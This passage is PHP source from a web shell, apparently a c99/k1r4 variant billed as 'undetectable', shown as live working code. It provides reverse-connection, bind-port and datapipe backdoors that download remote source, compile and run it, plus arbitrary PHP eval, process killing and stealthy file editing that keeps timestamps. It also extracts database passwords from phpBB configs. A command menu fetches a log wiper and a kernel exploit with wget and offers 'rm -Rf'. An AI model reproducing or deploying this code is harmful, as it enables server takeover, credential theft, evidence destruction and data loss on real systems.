$ext = $w[count($w)-1]; | |
unset($w[count($w)-1]); | |
$srcpath = join(".",$w).".".rand(0,999).".".$ext; | |
$binpath = $tmpdir.join(".",$w).rand(0,999); | |
if ($ext == "pl") {$binpath = $srcpath;} | |
@unlink($srcpath); | |
$fp = fopen($srcpath,"ab+"); | |
if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} | |
elseif (!$data = k1r4getsource($datapipe["src"])) {echo "Can't download sources!";} | |
else | |
{ | |
fwrite($fp,$data,strlen($data)); | |
fclose($fp); | |
if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} | |
list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); | |
$v[1] = str_replace("%path",$binpath,$v[1]); | |
$v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); | |
$v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); | |
$v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); | |
$v[1] = str_replace("//","/",$v[1]); | |
$retbind = myshellexec($v[1]." > /dev/null &"); | |
sleep(5); | |
$sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); | |
if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} | |
else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";} | |
} | |
echo "<br>"; | |
} | |
} | |
?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>"> Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>"> <select name="bind[src]"><?php | |
foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} | |
?></select> <input type=submit name=bindsubmit value="Bind"></form> | |
<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>"> Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>"> <select name="bc[src]"><?php | |
foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} | |
?></select> <input type=submit name=bcsubmit value="Connect"></form> | |
Click "Connect" only after open port for it. You should use NetCat©, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> | |
<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>"> Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>"> <select name="datapipe[src]"><?php | |
foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} | |
?></select> <input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php | |
} | |
if ($act == "processes") | |
{ | |
echo "<b>Processes:</b><br>"; | |
if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} | |
else {$handler = "tasklist";} | |
$ret = myshellexec($handler); | |
if (!$ret) {echo "Can't execute \"".$handler."\"!";} | |
else | |
{ | |
if (empty($processes_sort)) {$processes_sort = $sort_default;} | |
$parsesort = parsesort($processes_sort); | |
if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} | |
$k = $parsesort[0]; | |
if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} | |
else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} | |
$ret = htmlspecialchars($ret); | |
if (!$win) | |
{ | |
if ($pid) | |
{ | |
if (is_null($sig)) {$sig = 9;} | |
echo "Sending signal ".$sig." to #".$pid."... "; | |
if (posix_kill($pid,$sig)) {echo "OK.";} | |
else {echo "ERROR.";} | |
} | |
while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} | |
$stack = explode("\n",$ret); | |
$head = explode(" ",$stack[0]); | |
unset($stack[0]); | |
for($i=0;$i<count($head);$i++) | |
{ | |
if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} | |
} | |
$prcs = array(); | |
foreach ($stack as $line) | |
{ | |
if (!empty($line)) | |
{ | |
echo "<tr>"; | |
$line = explode(" ",$line); | |
$line[10] = join(" ",array_slice($line,10)); | |
$line = array_slice($line,0,11); | |
if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} | |
$line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; | |
$prcs[] = $line; | |
echo "</tr>"; | |
} | |
} | |
} | |
else | |
{ | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
while (ereg("",$ret)) {$ret = str_replace("","",$ret);} | |
while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} | |
$ret = convert_cyr_string($ret,"d","w"); | |
$stack = explode("\n",$ret); | |
unset($stack[0],$stack[2]); | |
$stack = array_values($stack); | |
$head = explode("",$stack[0]); | |
$head[1] = explode(" ",$head[1]); | |
$head[1] = $head[1][0]; | |
$stack = array_slice($stack,1); | |
unset($head[2]); | |
$head = array_values($head); | |
if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} | |
else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} | |
if ($k > count($head)) {$k = count($head)-1;} | |
for($i=0;$i<count($head);$i++) | |
{ | |
if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} | |
} | |
$prcs = array(); | |
foreach ($stack as $line) | |
{ | |
if (!empty($line)) | |
{ | |
echo "<tr>"; | |
$line = explode("",$line); | |
$line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); | |
$line[2] = intval(str_replace(" ","",$line[2]))*1024; | |
$prcs[] = $line; | |
echo "</tr>"; | |
} | |
} | |
} | |
$head[$k] = "<b>".$head[$k]."</b>".$y; | |
$v = $processes_sort[0]; | |
usort($prcs,"tabsort"); | |
if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} | |
$tab = array(); | |
$tab[] = $head; | |
$tab = array_merge($tab,$prcs); | |
echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; | |
foreach($tab as $i=>$k) | |
{ | |
echo "<tr>"; | |
foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} | |
echo "</tr>"; | |
} | |
echo "</table>"; | |
} | |
} | |
if ($act == "eval") | |
{ | |
if (!empty($eval)) | |
{ | |
echo "<b>Result of execution this PHP-code</b>:<br>"; | |
$tmp = ob_get_contents(); | |
$olddir = realpath("."); | |
@chdir($d); | |
if ($tmp) | |
{ | |
ob_clean(); | |
eval($eval); | |
$ret = ob_get_contents(); | |
$ret = convert_cyr_string($ret,"d","w"); | |
ob_clean(); | |
echo $tmp; | |
if ($eval_txt) | |
{ | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
} | |
else | |
{ | |
if ($eval_txt) | |
{ | |
echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; | |
eval($eval); | |
echo "</textarea>"; | |
} | |
else {echo $ret;} | |
} | |
@chdir($olddir); | |
} | |
else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} | |
echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; | |
} | |
if ($act == "f") | |
{ | |
if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") | |
{ | |
if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} | |
else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} | |
} | |
else | |
{ | |
$r = @file_get_contents($d.$f); | |
$ext = explode(".",$f); | |
$c = count($ext)-1; | |
$ext = $ext[$c]; | |
$ext = strtolower($ext); | |
$rft = ""; | |
foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} | |
if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} | |
if (empty($ft)) {$ft = $rft;} | |
$arr = array( | |
array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), | |
array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), | |
array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), | |
array("Code","code"), | |
array("Session","phpsess"), | |
array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), | |
array("SDB","sdb"), | |
array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), | |
array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), | |
array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), | |
array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), | |
array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") | |
); | |
echo "<b>Viewing file: <img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; | |
foreach($arr as $t) | |
{ | |
if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} | |
elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} | |
else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} | |
echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; | |
} | |
echo "<hr size=\"1\" noshade>"; | |
if ($ft == "info") | |
{ | |
echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; | |
if (!$win) | |
{ | |
echo "<tr><td><b>Owner/Group</b></td><td> "; | |
$ow = posix_getpwuid(fileowner($d.$f)); | |
$gr = posix_getgrgid(filegroup($d.$f)); | |
echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); | |
} | |
echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; | |
$fi = fopen($d.$f,"rb"); | |
if ($fi) | |
{ | |
if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} | |
else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} | |
$n = 0; | |
$a0 = "00000000<br>"; | |
$a1 = ""; | |
$a2 = ""; | |
for ($i=0; $i<strlen($str); $i++) | |
{ | |
$a1 .= sprintf("%02X",ord($str[$i]))." "; | |
switch (ord($str[$i])) | |
{ | |
case 0: $a2 .= "<font>0</font>"; break; | |
case 32: | |
case 10: | |
case 13: $a2 .= " "; break; | |
default: $a2 .= htmlspecialchars($str[$i]); | |
} | |
$n++; | |
if ($n == $hexdump_rows) | |
{ | |
$n = 0; | |
if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} | |
$a1 .= "<br>"; | |
$a2 .= "<br>"; | |
} | |
} | |
//if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} | |
echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; | |
} | |
$encoded = ""; | |
if ($base64 == 1) | |
{ | |
echo "<b>Base64 Encode</b><br>"; | |
$encoded = base64_encode(file_get_contents($d.$f)); | |
} | |
elseif($base64 == 2) | |
{ | |
echo "<b>Base64 Encode + Chunk</b><br>"; | |
$encoded = chunk_split(base64_encode(file_get_contents($d.$f))); | |
} | |
elseif($base64 == 3) | |
{ | |
echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; | |
$encoded = base64_encode(file_get_contents($d.$f)); | |
$encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); | |
} | |
elseif($base64 == 4) | |
{ | |
$text = file_get_contents($d.$f); | |
$encoded = base64_decode($text); | |
echo "<b>Base64 Decode"; | |
if (base64_encode($encoded) != $text) {echo " (failed)";} | |
echo "</b><br>"; | |
} | |
if (!empty($encoded)) | |
{ | |
echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; | |
} | |
echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> | |
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr> | |
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr> | |
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr> | |
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr> | |
<P>"; | |
} | |
elseif ($ft == "html") | |
{ | |
if ($white) {@ob_clean();} | |
echo $r; | |
if ($white) {k1r4exit();} | |
} | |
elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} | |
elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} | |
elseif ($ft == "phpsess") | |
{ | |
echo "<pre>"; | |
$v = explode("|",$r); | |
echo $v[0]."<br>"; | |
var_dump(unserialize($v[1])); | |
echo "</pre>"; | |
} | |
elseif ($ft == "exe") | |
{ | |
$ext = explode(".",$f); | |
$c = count($ext)-1; | |
$ext = $ext[$c]; | |
$ext = strtolower($ext); | |
$rft = ""; | |
foreach($exeftypes as $k=>$v) | |
{ | |
if (in_array($ext,$v)) {$rft = $k; break;} | |
} | |
$cmd = str_replace("%f%",$f,$rft); | |
echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; | |
} | |
elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} | |
elseif ($ft == "code") | |
{ | |
if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) | |
{ | |
$arr = explode("\n",$r); | |
if (count($arr == 18)) | |
{ | |
include($d.$f); | |
echo "<b>phpBB configuration is detected in this file!<br>"; | |
if ($dbms == "mysql4") {$dbms = "mysql";} | |
if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} | |
else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by kira. Please, report us for fix.";} | |
echo "Parameters for manual connect:<br>"; | |
$cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); | |
foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} | |
echo "</b><hr size=\"1\" noshade>"; | |
} | |
} | |
echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; | |
if (!empty($white)) {@ob_clean();} | |
highlight_file($d.$f); | |
if (!empty($white)) {k1r4exit();} | |
echo "</div>"; | |
} | |
elseif ($ft == "download") | |
{ | |
@ob_clean(); | |
header("Content-type: application/octet-stream"); | |
header("Content-length: ".filesize($d.$f)); | |
header("Content-disposition: attachment; filename=\"".$f."\";"); | |
echo $r; | |
exit; | |
} | |
elseif ($ft == "notepad") | |
{ | |
@ob_clean(); | |
header("Content-type: text/plain"); | |
header("Content-disposition: attachment; filename=\"".$f.".txt\";"); | |
echo($r); | |
exit; | |
} | |
elseif ($ft == "img") | |
{ | |
$inf = getimagesize($d.$f); | |
if (!$white) | |
{ | |
if (empty($imgsize)) {$imgsize = 20;} | |
$width = $inf[0]/100*$imgsize; | |
$height = $inf[1]/100*$imgsize; | |
echo "<center><b>Size:</b> "; | |
$sizes = array("100","50","20"); | |
foreach ($sizes as $v) | |
{ | |
echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; | |
if ($imgsize != $v ) {echo $v;} | |
else {echo "<u>".$v."</u>";} | |
echo "</a> "; | |
} | |
echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; | |
} | |
else | |
{ | |
@ob_clean(); | |
$ext = explode($f,"."); | |
$ext = $ext[count($ext)-1]; | |
header("Content-type: ".$inf["mime"]); | |
readfile($d.$f); | |
exit; | |
} | |
} | |
elseif ($ft == "edit") | |
{ | |
if (!empty($submit)) | |
{ | |
if ($filestealth) {$stat = stat($d.$f);} | |
$fp = fopen($d.$f,"w"); | |
if (!$fp) {echo "<b>Can't write to file!</b>";} | |
else | |
{ | |
echo "<b>Saved!</b>"; | |
fwrite($fp,$edit_text); | |
fclose($fp); | |
if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} | |
$r = $edit_text; | |
} | |
} | |
$rows = count(explode("\r\n",$r)); | |
if ($rows < 10) {$rows = 10;} | |
if ($rows > 30) {$rows = 30;} | |
echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; | |
} | |
elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} | |
else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} | |
} | |
} | |
} | |
else | |
{ | |
@ob_clean(); | |
$images = array( | |
"arrow_ltr"=> | |
"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", | |
"back"=> | |
"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". | |
"Wg0JADs=", | |
"buffer"=> | |
"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". | |
"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", | |
"change"=> | |
"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". | |
"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". | |
"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". | |
"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". | |
"zMshADs=", | |
"delete"=> | |
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"IQA7" | |
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//For simple size- and speed-optimization. | |
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"ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), | |
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"ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), | |
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"ext_swf"=>array("ext_swf","ext_fla"), | |
"ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), | |
"ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") | |
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if (!$getall) | |
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header("Content-type: image/gif"); | |
header("Cache-control: public"); | |
header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); | |
header("Cache-control: max-age=".(60*60*24*7)); | |
header("Last-Modified: ".date("r",filemtime(__FILE__))); | |
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} | |
else | |
{ | |
foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} | |
natsort($images); | |
$k = array_keys($images); | |
echo "<center>"; | |
foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} | |
echo "</center>"; | |
} | |
exit; | |
} | |
if ($act == "about") {echo "<center>Undetectable version by <br> Spyk1r4 <br> <img src=\"http://emp3ror.com/images/emplogo1.gif\"></center>";} | |
?> | |
</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> | |
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> | |
<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE> | |
<br> | |
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> | |
<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> | |
<tr> | |
<td width="50%" height="83" valign="top"><center> | |
<div align="center">Useful Commands | |
</div> | |
<form action="<?php echo $surl; ?>"> | |
<div align="center"> | |
<input type=hidden name=act value="cmd"> | |
<input type=hidden name="d" value="<?php echo $dispd; ?>"> | |
<SELECT NAME="cmd"> | |
<OPTION VALUE="uname -a">Kernel version | |
<OPTION VALUE="w">Logged in users | |
<OPTION VALUE="lastlog">Last to connect | |
<OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins | |
<OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! | |
<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? | |
<OPTION VALUE="which wget curl w3m lynx">Downloaders? | |
<OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO | |
<OPTION VALUE="netstat -atup | grep IST">Open ports | |
<OPTION VALUE="locate gcc">gcc installed? | |
<OPTION VALUE="rm -Rf">Format box (DANGEROUS) | |
<OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) | |
<OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 | |
<OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) | |
<OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) | |
<OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) | |
<OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) | |
<OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) | |
<OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) | |
</SELECT> | |
<input type=hidden name="cmd_txt" value="1"> | |
| |
<input type=submit name=submit value="Execute"> | |
<br> | |
Warning. Kernel may be alerted using higher levels </div> | |
</form> | |
</td> | |
<td width="50%" height="83" valign="top"><center> | |
<center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> | |
<input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> | |
<input type="hidden" name="client" value="firefox-a"> | |
<input type="hidden" name="rls" value="org.mozilla:en-US:official"> | |
<input type="hidden" name="hl" value="en"> | |
<input type="hidden" name="hs" value="b7p"> | |
<input type=submit name="btnG" VALUE="Search"> | |
</form></center> | |
</td> | |
</tr></TABLE><br> | |
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1> | |
<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> | |
<tr> | |
